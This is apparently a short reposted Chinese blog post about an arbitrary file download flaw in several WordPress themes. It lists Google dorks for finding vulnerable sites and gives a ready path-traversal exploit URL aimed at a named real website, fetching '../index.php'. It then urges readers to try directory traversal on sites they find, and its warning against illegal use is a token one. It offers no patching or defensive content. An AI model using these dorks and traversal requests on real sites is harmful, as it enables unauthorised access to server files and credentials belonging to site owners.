WordPress 文件下载漏洞

Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php"

exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php

WordPress 文件下载漏洞_第1张图片

 

google dork: 

inurl:"/wp-content/themes/newspro2891/download.php"

inurl:"/wp-content/themes/cafesalivation/download.php"

inurl:"/wp-content/themes/duena/download.php"

WordPress 文件下载漏洞_第2张图片

可以尝试跨目录访问,碰下运气,稳一波

WordPress 文件下载漏洞_第3张图片

WordPress 文件下载漏洞_第4张图片

各位可以自行测试,请勿非法使用!!

你可能感兴趣的:(WordPress 文件下载漏洞)